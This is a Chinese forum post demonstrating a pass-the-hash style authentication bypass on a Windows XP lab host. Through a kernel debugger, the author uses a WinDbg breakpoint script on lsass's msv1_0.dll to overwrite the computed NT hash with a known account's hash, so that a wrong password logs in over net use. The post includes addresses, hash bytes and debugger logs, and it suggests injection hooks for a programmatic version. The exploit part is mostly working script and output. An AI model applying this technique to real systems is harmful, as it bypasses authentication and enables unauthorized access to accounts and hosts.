[原创]验证用NTHASH直接登录
见:NTLM安全认证测试一下子就验证成功了
主机上有个帐号trd密码1122他的nthash为9c be f6 79 93 aa e5 09 c5 9c fa 64 7c 8b 13 fb
假设现在虚拟机知道了主机的密码哈希,但是密码不清楚是什么来验证通过密码哈希也能成功!
之前已经知道密码哈希的计算是在lsass进程里面的msv1_0.dll模块的如下地方
001b:77c446e4 50 push eax
001b:77c446e5 56 push esi
001b:77c446e6 e869ffffff call msv1_0!SystemFunction007 (77c44654) 《===在这里面计算密码哈希
001b:77c446eb 8d4330 lea eax,[ebx+30h]
这里通过虚拟机调试修改的办法替换输入的密码哈希使他验证成功。【编程的话注入hook即可】
用如下windbg脚本
*trd_hash.x
* 1122
* NTLM 9c be f6 79 93 aa e5 09 c5 9c fa 64 7c 8b 13 fb
bp 77c446eb ".echo =pass=;dS esi;.echo =pwd_hash=;db ebx+10h l10;.echo =1122_hash=;eb ebx+10h 9c be f6 79 93 aa e5 09 c5 9c fa 64 7c 8b 13 fb;g"
1、未导入脚本前任意密码测试
d:\test>net use \\xpsp3 /user:trd 123456
发生系统错误 1326。
登录失败: 未知的用户名或错误密码。
2、导入脚本后再测试
d:\test>net use \\xpsp3 /user:trd 123456
命令成功完成。
============================log================================
nt!DbgBreakPointWithStatus+0x4:
804e45a2 cc int 3
kd> $<c:\temp\dbg\trd_hash.x
kd> * 1122
kd> * NTLM 9c be f6 79 93 aa e5 09 c5 9c fa 64 7c 8b 13 fb
kd> bp 77c446eb ".echo =pass=;dS esi;.echo =pwd_hash=;db ebx+10h l10;.echo =1122
_hash=;eb ebx+10h 9c be f6 79 93 aa e5 09 c5 9c fa 64 7c 8b 13 fb;g"
kd> g
=pass=
00d4f8d2 "123456"
=pwd_hash=
00d4f544 32 ed 87 bd b5 fd c5 e9-cb a8 85 47 37 68 18 d4 2..........G7h..
=1122_hash=
